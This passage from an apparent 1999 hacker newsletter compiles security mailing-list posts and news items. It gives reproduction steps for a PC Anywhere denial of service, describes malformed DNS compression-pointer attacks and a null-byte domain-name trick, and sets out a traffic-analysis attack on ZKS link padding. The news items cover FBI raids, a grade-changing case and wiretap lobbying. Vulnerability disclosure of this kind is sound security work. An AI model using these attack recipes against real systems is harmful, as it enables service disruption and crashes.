  5090.       through a pair of AIPs back to himself. He then increases the traffic
  5091.       through this route until total traffic between the pair of AIPs reach the
  5092.       bandwidth limit set by the ZKS Traffic Shaper. At this point the AIPs no
  5093.       longer send any padding packets to each other, and the real traffic
  5094.       throughput between them can be deduced by subtracting the traffic sent by
  5095.       the attacker from the bandwidth limit. 
  5096.       
  5097.       This attack implies that link padding buys virtually no security. An
  5098.       attacker, without access to network sniffers or cooperation of any AIP
  5099.       operator, can strip off link padding and obtain real-time throughput data
  5100.       between all pairs of AIPs. If end-to-end padding is not used, this data
  5101.       would correlate with traffic throughput of individual users, and
  5102.       statistical analysis could then reveal their supposedly anonymous routes.
  5103.       
  5104.       @HWA     
  5105.       
  5106.       
  5107.  26.0 DoS against PC Anywhere
  5108.       ~~~~~~~~~~~~~~~~~~~~~~~~
  5109.  
  5110.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml      
  5111.                 
  5112.  
  5113.       Date: Fri, 28 May 1999 12:02:15 -0700
  5114.       From: Chris Radigan <radigac@CERF.NET>
  5115.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  5116.       Subject: DoS against PC Anywhere
  5117.       
  5118.       
  5119.       Hello all,
  5120.       This is my first post to the group so I'll try to keep it as brief as
  5121.       possible.  Searching through the bugtraq archives, I came across articles
  5122.       001732, 001734, 001737, and 001739 regarding PC Anywhere.  So, I fired up my
  5123.       telnet client, pointed it at port 5631 on a non-production host, and pasted
  5124.       about 512kb of garbage (I copied & pasted a dll I opened in notepad) into it
  5125.       when PC Anywhere responded with "Please press <Enter>".  About 200k through
  5126.       this dump, PC Anywhere hangs, utilizing 100% of the CPU, rendering the
  5127.       target host useless but not crashing it. There's your DoS.
  5128.       
  5129.       I ran this attack over TCP/IP against a couple of fully patched NT 4.0
  5130.       Workstations (SP4), and a couple of fully patched NT 4.0 Servers (SP4), with
  5131.       802up_a, 802up_b, and hostup_b applied to PC Anywhere, RAS was not installed
  5132.       on any of the hosts. I got the same results on all machines.
  5133.       
  5134.       I got in touch with Symantec development and found out that they do have a
  5135.       fix for this problem, it's a patched aw32tcp.dll, it just hasn't made it to
  5136.       their website yet.  I have applied this fix to several machines (all with
  5137.       the afore mentioned PC Anywhere patches applied) and it does indeed fix the
  5138.       problem.
  5139.       
  5140.       Hope this info will help.  Thanks for your time.
  5141.       
  5142.       Chris
  5143.       
  5144.       -----------------------------------------------------------------------------
  5145.       
  5146.       Date: Mon, 31 May 1999 22:24:50 +0200
  5147.       From: MrJay@GMX.NET
  5148.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  5149.       Subject: Re: DoS against PC Anywhere
  5150.       
  5151.       Hello TRAQers,
  5152.       
  5153.       this is my second list-posting attempt, so please bear with me. Flames will be sent to /dev/nul anyways ;)
  5154.       
  5155.       Concerning PC Anywhere 32 v8.0x, I tried the following attacks:
  5156.       
  5157.       NT 4.0 Workstation (SP4) vs. NT 4.0 Workstation (SP4)
  5158.       and
  5159.       Win 98 (no patches, from what I was told) vs same NT 4.0 Workstation (SP4)
  5160.       
  5161.       All NT 4.0 running PC Anywhere 32 8.0 patched with formerly mentioned Updates except the aw32tcp.dll, which wasn't available to
  5162.       me. Major difference between Chris' and this version: I tested against the German version of PC Anywhere 32. RAS installed, no
  5163.       fancy firewalls, no 'special' security implemented.
  5164.       
  5165.       Not surprisingly the German Version of PC Anywhere didn't react much different. It hung when I posted those ~500KB of trash from
  5166.       the NT 4.0 attacker machine to Port 5631 of the PC Anywhere Host. Result: 100% CPU load, further connections blocked though the
  5167.       Host machine itsself still worked fine and was able to terminate the aw32host service by simply re-starting the Host mode in PC
  5168.       Anywhere.
  5169.       
  5170.       The more interesting one was the Win98 attack. Same procedure, different result. After pasting those 500KB the Server jumps to
  5171.       100% load for some seconds while working through the trash then it drops back to normal with the attacker's Telnet session again
  5172.       prompting for pressing the 'Enter' key. To make it short, a permanent DoS failed with a Win98 attacker's machine though
  5173.       generating quite some load to the host's 486 CPU ;-) Pheww...because this keeps us safe from about 99% of all attacks ;)
  5174.       Further difference: After pressing 'Enter' (unlike in the NT4.0 attack, where you loose connection) you are prompted for a
  5175.       Username and password.... Could this be due to different possible Host Type options in Telnet (VT 52 on the Win98 vs. VT 100 on
  5176.       NT 4.0)? In this case, could this also be the reason for the different reaction to the attack? Comments?
  5177.       
  5178.       In case this one gets through, thank you for your time.
  5179.       
  5180.       Jay.
  5181.       
  5182.       P.S.: Does anyone know about the release date of the German NT 4.0 Service Pack 5? I couldn't get information on that via the
  5183.       German or U.S. Web-Site.
  5184.       
  5185.       -----------------------------------------------------------------------------
  5186.       
  5187.       Date: Mon, 31 May 1999 13:34:34 +0200
  5188.       From: Craig Hind <hindc@icon.co.za>
  5189.       To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  5190.       Subject: Re: DoS against PC Anywhere
  5191.       
  5192.       Hi,
  5193.       
  5194.       I managed to replicate this and checked Symantec's FTP site. There is a new
  5195.       aw32tcp.dll there dated May 26, 1999. I got it and patched one of my
  5196.       machines and it seems to work, although the description of the file on
  5197.       ftp.symantec.com/public/english_us_canada/products/pcanywhere/pcanywhere32/v
  5198.       er8.0/updates does not mention a denial of service.
  5199.       
  5200.       Regards
  5201.       Craig
  5202.       
  5203.       
  5204.       
  5205.       > -----Original Message-----
  5206.       > From: Chris Radigan [mailto:radigac@CERF.NET]
  5207.       > Sent: Friday, May 28, 1999 21:02
  5208.       > To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
  5209.       > Subject: DoS against PC Anywhere
  5210.       >
  5211.       
  5212.       
  5213.       @HWA
  5214.       
  5215.  27.0 weaknesses in dns label decoding, denial of service attack (code included) (fwd)
  5216.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5217.       
  5218.       From PacketStorm http://www.genocide2600.com/~tattooman/new.shtml      
  5219.          
  5220.  
  5221.       Date: Sun, 30 May 1999 17:16:22 +0200 (CEST)
  5222.       From: Sebastian <scut@nb.in-berlin.de>
  5223.       To: packetstorm@genocide2600.com
  5224.       Subject: weaknesses in dns label decoding, denial of service attack (code included) (fwd)
  5225.       Parts/Attachments:
  5226.          1 Shown     87 lines  Text
  5227.          2          1.8 KB     Application, "zlip.tar.gz"
  5228.       ----------------------------------------
  5229.       
  5230.       keywords: some dns packet decoders (sniffers, ids systems (?), dns
  5231.                 servers) may be vulnerable to malformed compressed domain names
  5232.                 inside dns packets. 
  5233.       
  5234.       
  5235.       hi,
  5236.       
  5237.       as I played with the DNS RFC (1035 especially) i came up with the idea to
  5238.       create malformed compressed dns domains inside the DNS packet to make it
  5239.       impossible for the DNS packet decoder to decompress it, which might lead
  5240.       to a denial of service attack.
  5241.       
  5242.       On my tests I found my BIND servers resisting all attacks (three different
  5243.       types), but all sniffers I used to view the DNS packets send to the
  5244.       server behaved in a very "special" way.
  5245.       
  5246.       
  5247.       First test (pointing-to-itself-compression (zlip-1.c))
  5248.       
  5249.       The DNS domain consists out of multiple labels, and message "compression"
  5250.       allows you to let a pointer point to a previous label inside the packet,
  5251.       to save bytes in the DNS packet. I just created a pointer that points to
  5252.       itself, meaning on a recursive domain decompression (like etherreal uses),
  5253.       this will produce effects like segfaulting or hanging.
  5254.       Etherreal alloc's memory until the system crashes, tcpdump stopped working
  5255.       before the packet is received, on SIGINT, it displays the malformed
  5256.       packet, but dropped all other packets:
  5257.       
  5258.       14:57:59.025013 128.75.9.2.48078 > victim.ns.org.domain: 30993 Type49159
  5259.       (Class 49168)?
  5260.       
  5261.       
  5262.       Second test (crossreferencing pointers (zlip-2.c))
  5263.       
  5264.       Similar to the first code, but now two pointer are used to reference each
  5265.       other, speeding up the effect on Etherreal.
  5266.       Results are the same as in the first test.
  5267.       
  5268.       
  5269.       Third test (very long label, decompressed multiple times (zlip-3.c))
  5270.       
  5271.       This time I used a long label (maximum of 63 characters), and referenced
  5272.       to it a dozend times, this will decode to a very long domain, therefore
  5273.       it may overflow some fixed-sized-buffers (because the rfc says "limited to
  5274.       500 characters" some programmers may prefer fixed buffers for dns
  5275.       decoders). This is the case in Etherreal, where such a request creates a
  5276.       segmentation fault (due to a buffer overrun).
  5277.       
  5278.       
  5279.       I just tested this with BIND as nameserver, which resisted all this tests,
  5280.       but I included the "exploit" code in this email to allow you to test your
  5281.       IDS, sniffers and nameservers against this.
  5282.       
  5283.       cu,
  5284.       scut
  5285.       
  5286.       
  5287.       -- 
  5288.       - scut@nb.in-berlin.de - http://nb.in-berlin.de/scut/ - sacbuctd@ircnet  --
  5289.       -- you don't need a lot of people to be great, you need a few great to be --
  5290.       -- the best -----------------------------------------------------------------
  5291.       
  5292.           [ Part 2, "zlip.tar.gz"  Application/X-GUNZIP  2.4KB. ]
  5293.       
  5294.       ------------------------------------------------------------------------------------
  5295.       
  5296.       Date: Mon, 31 May 1999 17:49:53 -0400
  5297.       From: bobk <bobk@SINISTER.COM>
  5298.       To: BUGTRAQ@netspace.org
  5299.       Subject: Re: weaknesses in dns label decoding,              denial of service attack (code included)
  5300.       
  5301.       On Sun, 30 May 1999, Sebastian wrote:
  5302.       
  5303.       >
  5304.       > keywords: some dns packet decoders (sniffers, ids systems (?), dns
  5305.       >           servers) may be vulnerable to malformed compressed domain names
  5306.       >           inside dns packets.
  5307.       >
  5308.       > sorry aleph1, if this has already been known or posted =)
  5309.       >
  5310.       >
  5311.       > hi,
  5312.       >
  5313.       > as I played with the DNS RFC (1035 especially) i came up with the idea to
  5314.       > create malformed compressed dns domains inside the DNS packet to make it
  5315.       > impossible for the DNS packet decoder to decompress it, which might lead
  5316.       > to a denial of service attack.
  5317.       
  5318.       Another thing to remember is that it is possible to put ABSOLUTELY
  5319.       ANYTHING inside a DNS domain name. This includes whitespace, control
  5320.       characters, and even NULL.
  5321.       
  5322.       Imagine what could happen if some program did a strcmp() on the following
  5323.       name:
  5324.       
  5325.       rs.internic.net\0.xa.net
  5326.       
  5327.       where, of course, \0 is a null
  5328.       
  5329.       Interested readers may ponder what type of programs may be exploited with
  5330.       this type of attack.
  5331.       
  5332.       @HWA          
  5333.       
  5334.  28.0 Microsoft Worker Raided 
  5335.       ~~~~~~~~~~~~~~~~~~~~~~~
  5336.        
  5337.       From HNN http://www.hackernews.com/  
  5338.   
  5339.       contributed by Code Kid 
  5340.       VallaH, one of the victims of the recent FBI raids, was a
  5341.       contractor for Microsoft working on Windows 2000
  5342.       interoperability. Although he was not arrested and
  5343.       charges have not been filed against him he still lost his
  5344.       job. This of course raises the question of who is working
  5345.       where? Do employers really know the backgrounds of
  5346.       their employees? Is there anyway to tell? 
  5347.  
  5348.       MSNBC      
  5349.       http://www.msnbc.com/news/275876.asp
  5350.       
  5351.       Perils of moonlighting as a hacker
  5352.                  
  5353.       Microsoft employee was raided by FBI last week; are hackers working
  5354.       all over the software industry?
  5355.                                   
  5356.  
  5357.                                  
  5358.                                                               By Bob Sullivan
  5359.                                                                       MSNBC
  5360.  
  5361.       June 2 ù  Everybody does it; nobody wants to talk about it. Computer hackers ù ôwhite hatö or
  5362.       ôblack hatö ù are among the brightest minds in the software industry, so many are hired by
  5363.       big-name software companies. Then they dance the awkward dance of dual identities, engineer
  5364.       by day, hacker by night. The consequences of a misstep in that dance can be severe, as a hacker
  5365.       calling himself ôVallaHö learned last week. In his case, a visit from the FBI meant the end of
  5366.       his career at Microsoft, embarassment for the largest software company in the world, and a
  5367.       new focus on the role of hackers at work.
  5368.       
  5369.       JEFFREY ROBERSON, 19, was a self-described
  5370.       
  5371.       ôangry little kidö two years ago, fairly well-known as VallaH
  5372.       on the hacking scene, dabbling in writing hacker software
  5373.       tools. At his worst, he says, he participated in relatively
  5374.       benign ôdenial-of-serviceö attacks ù coordinated efforts to
  5375.       try to overwhelm a Web site with hits so it becomes
  5376.       unavailable. Then a Microsoft employee saw his
  5377.       programming code, was duly impressed and invited VallaH
  5378.       to Redmond, Wash. Over time, Roberson was convinced to
  5379.       put his skills to good use and took the job. HeÆs spent the
  5380.       past year working on Windows 2000, testing for
  5381.       interoperability with Unix systems ù his specialty.
  5382.              (Note: Microsoft is a partner in MSNBC.) 
  5383.  
  5384.  
  5385.              But he also stayed involved in the hacker ôscene.ö He
  5386.       says he hadnÆt done anything illegal since taking his job at
  5387.       Microsoft; in fact he says he spent his time trying to
  5388.       convince other ôangry little kidsö that they could be creative
  5389.       instead of destructive. ôI talked to them because I wanted to
  5390.       try to help them program.ö
  5391.              But someone passed his ôhandleö to the FBI recently.
  5392.       Then his Seattle-area apartment was raided May 26 in the
  5393.       hacker sweep, and VallaHÆs life instantly changed. He was
  5394.       immediately fired by Microsoft and went back home to his
  5395.       parents in the Baltimore area.
  5396.              
  5397.       IÆM ASHAMED THEYÆRE INVOLVED 
  5398.       
  5399.       ôSome people
  5400.       who had
  5401.       absolutely nothing
  5402.       to with with
  5403.       hacking at all
  5404.       [were raided].
  5405.       ôPeople with
  5406.       things going for
  5407.       them, innocent
  5408.       people, who are
  5409.       going to face
  5410.       consequences. 
  5411.       ù JEFFREY ROBERSON
  5412.       
  5413.       
  5414.              ôItÆs Microsoft policy; I understand where theyÆre
  5415.       coming from,ö Roberson said of his dismissal. He was
  5416.       actually a contractor at Microsoft, working through the Volt
  5417.       Computer agency. ôIÆm more of a liability than an asset.... I
  5418.       owe a great debt to Microsoft, and IÆm really ashamed that
  5419.       theyÆre involved.ö
  5420.              Are other ôhackersö working at Microsoft? Does the
  5421.       company recruit in the underbelly of the Internet, places like
  5422.       Internet Relay Chat rooms set up for hackers? The
  5423.       company wouldnÆt say.
  5424.              ôWe donÆt recruit people who are involved in illegal
  5425.       activities,ö spokesman Adam Sohn said. ôBut did one
  5426.       computer scientist see [VallaHÆs code] and thought, gee,
  5427.       this is ... great work, we should get this person? Surely that
  5428.       may happen.ö
  5429.              Other software firms wouldnÆt discuss company
  5430.       policies about hiring hackers when contacted for this article
  5431.       ù but hackers say the practice is common and
  5432.       complicated.
  5433.              
  5434.       ITÆS ONLY NATURAL
  5435.              ôIt is only natural to assume that someone who defaces
  5436.       Web pages at night also works for a computer-related
  5437.       company,ö said a man calling himself Space Rogue. Rogue
  5438.       works for L0pht Heavy Industries, a company of
  5439.       ôprofessional hackersö that is hired by firms to test
  5440.       corporate system security. 
  5441.              ôLast place I worked I tried to keep my involvement
  5442.       with L0pht and stuff quiet. Then word got around, as it
  5443.       always does. Then I get treated like royalty, and people tell
  5444.       me all the dirty deeds they have done to the company
  5445.       systems. Back doors, reading the bossÆs e-mail, all kinds of
  5446.       s***. I just shake my head and wonder.
  5447.              ôThe issue is most employers have no idea what the
  5448.       background is of their employees. I mean, itÆs not like
  5449.       youÆre going to put ædefaced 150 Web sitesÆ on your
  5450.       resume. And unless you have been arrested, no background
  5451.       check is going to turn anything up.ö
  5452.              
  5453.       FIND A HOLE, GET A JOB
  5454.              On the other hand, exposing security holes in front of
  5455.       the world is even better than a resume, said Russ Cooper,
  5456.       who moderates the most popular information service
  5457.       covering Windows NT security. His NTBugTraq mailing list
  5458.       has 25,000 subscribers, and his Web site gets 2 million hits
  5459.       a month. 
  5460.       
  5461.       ôThe issue is most
  5462.       employers have no
  5463.       idea what the
  5464.       background is of
  5465.       their employees. I
  5466.       mean, itÆs not like
  5467.       youÆre going to
  5468.       put ædefaced 150
  5469.       Web sitesÆ on
  5470.       your resume.ö 
  5471.       ù SPACE ROGUE
  5472.       L0phy Heavy Industries 
  5473.       
  5474.              ôA lot of people release exploit information to get
  5475.       jobs,ö Cooper says. Posting an exploit, or a security hole, to
  5476.       his list is one sure way to get the attention of software firms.
  5477.       ôCertainly I know of people who have posted and gotten
  5478.       job offers. Companies are interested in people who have
  5479.       demonstrated an aptitude for discovering problems. Finding
  5480.       people with skills is hard.ö
  5481.              But is it worth the risk? No, says Christopher Klaus,
  5482.       who founded Internet Security Systems Inc. The company
  5483.       writes software designed to automatically test for exploitable
  5484.       security holes, so-called scanning software. For ISS
  5485.       software to work, his programs must imitate the thought
  5486.       process of hackers ù still Klaus says he ignores the
  5487.       resumes he gets from hackers.
  5488.              ôWe find we have more success finding people with a
  5489.       networking background, people who know Unix and can
  5490.       program in C++, then train them in security. That works
  5491.       better than the other way around,ö he said.
  5492.              
  5493.       HAVING A HACKER ON STAFF 
  5494.       
  5495.       ôWhatÆs more fun
  5496.       than a buddyÆs
  5497.       reaction when the
  5498.       CD-drive door is
  5499.       opened
  5500.       mysteriously. :) ö 
  5501.       ù CARL-FREDRIK NEIKTER
  5502.       
  5503.              Having a hacker on staff is complicated because of the
  5504.       vague distinctions often made between ôwhite hat,ö ôblack
  5505.       hat,ö hackers and crackers. Anyone involved in computer
  5506.       security might be called a hacker (in fact, many say anyone
  5507.       involved in any kind of progamming is a hacker). Computer
  5508.       security administrators consider hacker mailing lists, Web
  5509.       pages and even chat rooms as part of their daily reading
  5510.       material, a requirement for keeping their systems secure
  5511.       against the latest exploits. 
  5512.              And thereÆs all manner of playful ôhackingö that goes on
  5513.       inside a company. One Microsoft employee told MSNBC
  5514.       that groups within the company sometimes hack each
  5515.       otherÆs Web pages, a harmless form of taunting. 
  5516.              But when does that kind of playfulness cross the line,
  5517.       become harmful? Many hackers donÆt believe temporarily
  5518.       defacing a Web page is destructive, though it is illegal. But
  5519.       what of the authoring of hacker ôtools,ö which are not
  5520.       illegal? For example, there are software packages used to
  5521.       scan Web sites for vulnerabilities; they are equally useful to
  5522.       security administrators testing their own systems and
  5523.       hackers looking for open doors. Other software simply
  5524.       makes it easy for someone whoÆs less skilled to hack into
  5525.       Web sites. ThatÆs what Roberson was writing when
  5526.       Micosoft contacted him ù he was one of many coders
  5527.       who write and distribute software that can be used to crack
  5528.       Web sites, then share it with a wink, saying theyÆre not
  5529.       responsible for how others use it. 
  5530.              
  5531.       HACKING TOOLS
  5532.              Among the most popular examples is NetBus, which
  5533.       allows a hacker to control a victimÆs PC from anywhere on
  5534.       the Internet, right down to opening and closing the
  5535.       CD-ROM door. Its author, Carl-Fredrik Neikter, said he
  5536.       wrote NetBus ôsolely to have a fun program. WhatÆs more
  5537.       fun than a buddyÆs reaction when the CD-drive door is
  5538.       opened mysteriously. :) I didnÆt think about trojans or a
  5539.       hacking tool.ö HeÆs now trying to market the tool as
  5540.       commercial shareware.
  5541.              Others who write such tools say theyÆre doing it to
  5542.       draw attention to security holes ù that was the motivation
  5543.       behind Back Orifice, written by members of the Cult of the
  5544.       Dead Cow, according to member Sir Dystic. 
  5545.              While writing such software is not illegal, itÆs also not
  5546.       the kind of moonlighting many companies would be proud
  5547.       of. But how much control does a company have over its
  5548.       employeesÆ activity outside of work? 
  5549.              
  5550.       FACING CONSEQUENCES
  5551.              According to Roberson, his Microsoft employers knew
  5552.       he came ôfrom the scene,ö even knew he still communicated
  5553.       with hackers. Only the embarrassment of the raid cost him
  5554.       his job ù and he now regrets his past as a hacker.
  5555.              ôI wish I didnÆt talk to these people,ö he said. ôBut I
  5556.       grew up in the scene, it was all I knew, it was who I was.ö
  5557.       So he felt an obligation to keep up friendships and ôhelp
  5558.       these kids.ö
  5559.              But in the end those friendships cost him his job ù
  5560.       and, says Roberson, others involved in the raids are facing
  5561.       similar consequences.
  5562.              ôSome people who had absolutely nothing to with with
  5563.       hacking at all [were raided],ö he said. ôPeople with things
  5564.       going for them, innocent people, who are going to face
  5565.       consequences.ö He says others raided last week got in
  5566.       trouble with school officials and employers but declined to
  5567.       elaborate. 
  5568.              Such consequences ù and even threats of prosecution
  5569.       and computer seizure made by the White House, CIA and
  5570.       FBI ù donÆt seem to be deterring many hackers, who on
  5571.       Wednesday continued to deface government Web sites.
  5572.       
  5573.       
  5574.       @HWA
  5575.       
  5576.  29.0 Is the FBI Missing the Point? 
  5577.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5578.  
  5579.        From HNN http://www.hackernews.com/
  5580.  
  5581.        contributed by McIntyre 
  5582.        With the focus of the FBI squarely on web page
  5583.        defacers are more serious criminals being overlooked?
  5584.        Are Scr1pt Kiddies really who the FBI should be worried
  5585.        about? Or should they be searching for cyber crooks
  5586.        whom you do not hear about, that stay in the shadows?
  5587.  
  5588.        ZD Net            
  5589.        http://www.zdnet.com/zdnn/stories/news/0,4586,2269398,00.html
  5590.        
  5591.  30.0 Norwegian Newspaper Cracked 
  5592.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
  5593.  
  5594.        From HNN http://www.hackernews.com/
  5595.         
  5596.        contributed by luyten 
  5597.        Two 17 year olds were arrested in their home by
  5598.        Norwegian police. Both of them have admitted to
  5599.        defacing the web page of Norway's biggest newspaper
  5600.        "Aftenposten". They replaced the main page with a
  5601.        graphic of three men urinating on the newspapers logo.
  5602.        The defaced page was visible for approximately one and
  5603.        a half hours. Both suspects risk getting a criminal record
  5604.        and being sued for a large amount of money from
  5605.        Aftenposten and Scandinavia Online (SOL) for their
  5606.        alleged losses. 
  5607.  
  5608.        Aftenposten- Sorry it is in Norwegian
  5609.        http://www.aftenposten.no/nyheter/nett/d84153.htm
  5610.        
  5611.        HNN Cracked Pages Archive
  5612.        http://www.hackernews.com/archive/crackarch.htm
  5613.        
  5614.        
  5615.  31.0 Student Busted for Changing Grades 
  5616.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5617.       
  5618.       From HNN http://www.hackernews.com/
  5619.  
  5620.       contributed by riot 
  5621.       Students at Evergreen High School in Washington state
  5622.       paid a fellow student, Adam Jerome, $5 each to change
  5623.       their grades on the school computer. Mr. Jerome now
  5624.       faces a possible charge of computer trespass in the first
  5625.       degree, a Class C felony, for which a first time offender
  5626.       can receive as much as 90 days in jail. The purchasers
  5627.       of the grades, one of whom was the principals daughter,
  5628.       may be charged with being accomplices to a computer
  5629.       trespass. (I'm not even going to get into all the FUD and
  5630.       inaccuracies in this article) 
  5631.  
  5632.       The Columbian     
  5633.       http://www.columbian.com/06021999/front_pa/60760.html
  5634.       
  5635.       HACKING SUSPECT MAY BE CHARGED 
  5636.  
  5637.       Wednesday, June 2, 1999
  5638.       By TOM VOGT and RICHARD S. CLAYTON,
  5639.       Columbian staff writers
  5640.  
  5641.       It could be the fantasy of many computer-savvy
  5642.       students: hacking into the school's data system and
  5643.       changing your grades. 
  5644.  
  5645.           Now prosecutors are considering charges
  5646.       against an Evergreen High School student accused
  5647.       of using his home computer to raise grades for 22
  5648.       classmates. 
  5649.  
  5650.           Twenty-three students were disciplined. One
  5651.       was expelled, one was placed on long-term
  5652.       suspension, and the rest received 10-day
  5653.       suspensions. 
  5654.  
  5655.           The incident coincided with increasing national
  5656.       attention to computer security in the wake of
  5657.       high-tech vandalism against computers or Web
  5658.       sites in the FBI, the U.S. Senate, the Department
  5659.       of the Interior and a federal supercomputer
  5660.       laboratory in Idaho. 
  5661.  
  5662.           The expelled student is senior Adam Jerome,
  5663.       who was responsible for the hacking, according to
  5664.       a district source. 
  5665.  
  5666.           The computer hacking affected "the integrity of
  5667.       the whole system: kids working hard to earn
  5668.       grades," Evergreen Principal Jim Hudson said
  5669.       Tuesday. 
  5670.  
  5671.           Art Curtis, Clark County prosecutor, said his
  5672.       office is studying the case and will decide whether
  5673.       to file charges in the next week or so. The charge
  5674.       would be computer trespass in the first degree, a
  5675.       Class C felony. For a first offender, the maximum
  5676.       sentence is 90 days in jail. 
  5677.  
  5678.           Kirby Neumann-Rea, district spokesman, said
  5679.       each student paid $5 to have grades inflated. They
  5680.       might face charges of being accomplices to a
  5681.       computer trespass, Curtis said. 
  5682.  
  5683.           One of the students is Katy Hudson, daughter of
  5684.       the Evergreen principal. 
  5685.  
  5686.           At least one student used the grade boost to get
  5687.       a scholarship, Curtis said. 
  5688.  
  5689.           "This is not just a prank," Curtis said. "If there is
  5690.       an issue of a potential scholarship, there is a
  5691.       concern." 
  5692.  
  5693.           Some students received credit for courses they
  5694.       never took. 
  5695.  
  5696.           District officials said computer security has
  5697.       been upgraded since the incident. The school's
  5698.       computers are part of a system used by 262
  5699.       districts in the state. 
  5700.  
  5701.           The hacking started in February. When a
  5702.       teacher heard about the grade boosts, school
  5703.       officials investigated in April and confronted the
  5704.       students. 
  5705.  
  5706.           "All the kids came clean," Hudson said, and that
  5707.       included the computer expert. 
  5708.  
  5709.           "He sat down with us and gave us a complete
  5710.       rundown," Hudson said. 
  5711.  
  5712.           The district also forwarded correct information
  5713.       to colleges for the students involved. 
  5714.  
  5715.           All the seniors will graduate, although Jerome
  5716.       will not go through the graduation ceremony. 
  5717.  
  5718.           Evergreen School District School operates its
  5719.       own computer information system, which maintains
  5720.       student grades as well as other records. 
  5721.  
  5722.           Evergreen's system is separate from the
  5723.       regional data center maintained by Educational
  5724.       Service District 112. All but one other Clark
  5725.       County district (tiny Green Mountain) uses the
  5726.       ESD's center to secure student grades and other
  5727.       records. 
  5728.  
  5729.           The ESD is unaware of any hackers illegally
  5730.       entering its system in recent years, said Marge
  5731.       Cartwright, the ESD's director of communications
  5732.       and information management. 
  5733.  
  5734.           Cartwright knows of two attempts to hack into
  5735.       the ESD's data center. Both were unsuccessful. 
  5736.  
  5737.           "We feel confident in the security of the
  5738.       system," Cartwright said. "We haven't had a
  5739.       problem with students breaking into it. I'm not
  5740.       concerned about that." 
  5741.  
  5742.           To access the ESD's system, a user or hacker
  5743.       would need more than several passwords and a
  5744.       confidential user name. They also would have to
  5745.       navigate more than one "firewall." One of these
  5746.       firewalls limits access by allowing only specific
  5747.       computers at specific schools to enter, Cartwright
  5748.       said. 
  5749.  
  5750.           Cartwright said she was unaware how the
  5751.       student allegedly entered Evergreen's system, but
  5752.       could also have used "sniffer" software that helps
  5753.       decipher passwords and codes. 
  5754.  
  5755.       @HWA       
  5756.       
  5757.  32.0 FBI Lobbying Group Pushes for EavesDropping Capability 
  5758.       ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5759.  
  5760.       From HNN http://www.hackernews.com/                                             
  5761.                                         
  5762.       contributed by s3cr3t 
  5763.       The International Law Enforcement Telecommunications
  5764.       Seminar (ILETS), a reportedly top secret international
  5765.       lobbying group made up of police officers and security
  5766.       agents from around the world, will attempt to convince
  5767.       New Zealand's government that it needs to filter the
  5768.       Internet. ILETS was founded by the FBI in 1993 to push
  5769.       for wiretap abilities in worldwide communications and
  5770.       has been heavily involved with the ENFOPOL 98 Affair 
  5771.  
  5772.       IDG News
  5773.       http://www.idg.co.nz/nzweb/dfca.html
  5774.       
  5775.       Telepolis     
  5776.       http://www.heise.de/tp/english/special/enfo/6398/1.html
  5777.       
  5778.       Monday May 31 
  5779.  
  5780.       Lobby group pushes for Police email snooping 
  5781.       NZ Police refuse to comment
  5782.  
  5783.       By Paul Brislen - AUCKLAND 
  5784.  
  5785.       An international lobby group aims to convince New Zealand's government that it should implement
  5786.       laws requiring Internet service providers (ISP) to allow law enforcement officers access to
  5787.       anyone's email.
  5788.  
  5789.       The lobby group, the International Law Enforcement Telecommunications Seminar (ILETS), is
  5790.       made up of police officers and security agents from a number of Western countries including New
  5791.       Zealand and Australia. Hong Kong is also included. 
  5792.  
  5793.       Set up in 1993 by the FBI to push building universal wiretap-ability into worldwide communications,
  5794.       ILETS now has its sights firmly set on tapping into the Internet and may have convinced a meeting
  5795.       of European ministers to adopt its latest plan.
  5796.  
  5797.       ILETS plans to lobby New Zealand's government to introduce similar laws here, although the
  5798.       minister's press secretary, Jonathan Kinsella, says he has not heard of ILETS.NZ Police refuse to
  5799.       comment
  5800.  
  5801.       "That sounds more like an operational matter. That would be handled by national headquarters."
  5802.  
  5803.       New Zealand Police does have a representative in ILETS but he would not comment on ILETS or
  5804.       its role in New Zealand. "It's all supposed to be top secret. I'm surprised you got hold of the name
  5805.       even," he says. He describes ILETS as an "advisory group" and feels that monitoring of Internet
  5806.       communication is a "worldwide trend" of which New Zealand is only a part.
  5807.  
  5808.       New Zealand law does not allow such interceptions to take place here and our strict privacy laws
  5809.       would also cause ILETS some trouble. However, the group will be pushing the issue at a political
  5810.       level.
  5811.  
  5812.       Enfopol 19, the document currently before the European council of ministers, requires
  5813.       manufacturers and operators to build in "interception interfaces" to the Internet and all future digital
  5814.       communications systems. Under the scheme, European ISPs would be required to install
  5815.       monitoring equipment or software on site. The European governments would then have the
  5816.       capability to track an individual's "static and dynamic IP address . credit card number and email
  5817.       address", according to the leaked Enfopol 19 document, available at the Foundation for Information
  5818.       Policy Research's (FIPR) Web site (www.fipr.org). 
  5819.  
  5820.       FIPR, which describes itself as "an independent body that studies the interaction between
  5821.       information technology and society", is based in the UK and has been following ILETS since its
  5822.       cover was blown by the German online publication Telepolis. In the UK, opposition from ISPs is
  5823.       growing.
  5824.  
  5825.       "Anything along the lines [of the ENFOPOL scheme] would probably have astronomical cost
  5826.       implications," says Keith Mitchell, chairman of the London Internet Exchange. "In the event such a
  5827.       scheme was ever implementable, the costs should be met by the enforcement authorities. Since the
  5828.       industry cannot afford it I doubt the public sector could." Mitchell doubts whether such a scheme
  5829.       would work on a technical level, something that Telecom is also concerned about.
  5830.  
  5831.       "The amount of email going through Xtra's email servers is around five times the volume it was last
  5832.       year and it's accelerating," says spokesman Glen Sowry. Telecom has recently installed a new
  5833.       email server which is scalable up to a million users.
  5834.  
  5835.       "At this stage you would have to take into consideration the sheer volumes of what you are trying
  5836.       to achieve."
  5837.  
  5838.       European ministers are to meet on May 27 to discuss the adoption of Enfopol 19. 
  5839.  
  5840.       More information can be found at: www.heise.de/tp/english/special/enfo/default.html. 
  5841.       
  5842.       
  5843.       @HWA
  5844.       
  5845.       
  5846.  33.0 Cons, Cons and more Cons 
  5847.       ~~~~~~~~~~~~~~~~~~~~~~~~
  5848.  
